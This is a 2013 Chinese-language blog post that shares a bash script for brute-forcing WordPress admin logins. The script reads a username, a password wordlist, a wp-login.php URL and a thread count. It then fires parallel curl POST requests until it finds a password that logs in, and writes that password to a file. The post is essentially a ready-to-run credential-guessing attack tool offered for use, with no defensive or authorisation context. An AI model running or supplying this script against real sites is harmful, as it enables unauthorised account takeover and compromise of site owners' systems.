WordPress后台密码暴力破解脚本

类别:linux post by sunshine / 2013-6-11 06:23 Tuesday

WordPress后台密码暴力破解程序,请先确认机器已安装curl

 

#!/bin/bash
#by leo108
#使用方式:./wp-pwd.sh 用户名 字典 登录页面 线程数
#例如: ./wp-pwd.sh leo 1.txt http://xxx.com/wp-login.php 15
user=$1
zidian=$2
url=$3
thread=$4
function guess {
    curl -s -d "log=$user&pwd=$1" $url >> $1.html
    l=$(wc -l $1.html| awk -F[:" "]+ '{print $1}')
    if [ 0 -eq $l ]; then
        echo $1 >> pwd.txt
        rm $1.html
        return 1
    else
        rm $1.html
        return 0
    fi
}
if [ -e pwd.txt ]; then
    rm pwd.txt
fi
tmp_fifofile="/tmp/$$.fifo"
mkfifo $tmp_fifofile
exec 6<>$tmp_fifofile
rm $tmp_fifofile
for ((i=0;i<$thread;i++));
do
    echo
done >&6
while read line;do
    if [ -e pwd.txt ]; then
        break
    fi
    read -u6
    {
        echo "Testing "$line
        guess $line
        echo >&6
    } &
done < $zidian
wait
exec 6>&-
if [ -e pwd.txt ]; then
    echo "Password is "
    cat pwd.txt
    rm pwd.txt
else
    echo "Not Found"
fi
exit 0

标签:shell, WordPress, awk, html, 密码,
评论(0) 引用(0) 浏览(5452)

版权所有:《太阳花工作室》 => 《WordPress后台密码暴力破解脚本
本文地址:http://bg.artuion.com/linux/266.html
除非注明,文章均为 《太阳花工作室》 原创,欢迎转载!转载请注明本文地址,谢谢。

« FATAL ERROR: Could not find ./bin/my_print_defaults 解决方法 | 源码安装php , ./configure无法通过:报错Note that the MySQL client library is not bundled anymore!»